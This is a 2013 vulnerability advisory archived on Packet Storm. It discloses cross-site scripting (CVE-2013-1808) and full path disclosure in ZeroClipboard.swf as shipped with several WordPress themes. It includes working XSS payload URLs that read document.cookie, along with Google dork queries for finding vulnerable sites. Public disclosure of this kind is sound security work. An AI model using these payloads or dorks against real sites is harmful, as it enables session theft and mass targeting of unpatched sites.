exploit the possibilities

ZeroClipbord.swf Cross Site Scripting / Path Disclosure

ZeroClipbord.swf Cross Site Scripting / Path Disclosure
Posted Apr 9, 2013
Authored by MustLive

ZeroClipboard.swf as included with multiple themes in WordPress suffers from cross site scripting and path disclosure vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2013-1808
MD5 | 80dce9ff1e03246e909e1fc95299b1e8

ZeroClipbord.swf Cross Site Scripting / Path Disclosure

Change Mirror Download
Hello list!

These are Cross-Site Scripting and Full path disclosure vulnerabilities in
multiple themes for WordPress (with ZeroClipboard.swf).

Earlier I've wrote about Cross-Site Scripting vulnerabilities in
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote
that this is very widespread flash-file and it's placed at tens of thousands
of web sites. And it's used in hundreds of web applications.

After publishing this and two other advisories related to ZeroClipboard in
February, I've published last month two new advisories (which I prepared in
February). About vulnerabilities in WP plugins and in WP themes (with
ZeroClipboard.swf).

This flash-file is used in hundreds of themes for WordPress (including
custom themes for different sites). Among them are Montezuma, Striking,
Couponpress, Azolla, Black and White. And there are many other vulnerable
themes for WP with ZeroClipboard.swf. Also there is one theme which also
contains ZeroClipboard10.swf.

SecurityVulns ID: 12910
CVE: CVE-2013-1808

-------------------------
Affected products:
-------------------------

Vulnerable are the next web applications (WordPress themes) with
ZeroClipboard:

All versions of Montezuma, Striking, Couponpress, Azolla, Black and White.

Both XSS vulnerabilities in ZeroClipboard are fixed in the last version
ZeroClipboard 1.1.7. All developers should update swf-file in their
software. I wrote about developers who begun fixing these vulnerabilities in
ZeroClipboard in their software
(http://seclists.org/fulldisclosure/2013/Mar/207).

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into buffer (as described
in previous advisory).

http://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

This is very widespread flash-file (both versions), as you can find out via
Google dorks. If at searching by standard Goolge dork it's possible to find
tens thousand of sites with ZeroClipboard.swf or ZeroClipboard10.swf, then
at searching for themes for WordPress it's possible to find hundreds
thousand of sites with these flash-files.

inurl:zeroclipboard.swf inurl:/wp-content/themes/ - about 70200 (in
February, now more)
zeroclipboard.swf inurl:/wp-content/themes/ - about 85600 (in February, now
more)

Full path disclosure (WASC-13):

All mentioned themes have FPD vulnerabilities in php-files (in index.php and
others), which is typically for WP themes.

http://site/wp-content/themes/montezuma/

http://site/wp-content/themes/striking/

http://site/wp-content/themes/couponpress/

http://site/wp-content/themes/azolla/

http://site/wp-content/themes/black-and-white/

------------
Timeline:
------------

2013.02.19 - after contacting with old and new developers of ZeroClipboard,
I disclosed vulnerabilities in ZeroClipboard to the lists.
2013.02 - in February I wrote two additional advisories about
vulnerabilities in different web applications with ZeroClipboard to draw
more attention to this issue concerned with hundreds of web applications.
2013.03.28 - disclosed vulnerabilities in multiple themes for WordPress at
my site (http://websecurity.com.ua/6401/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close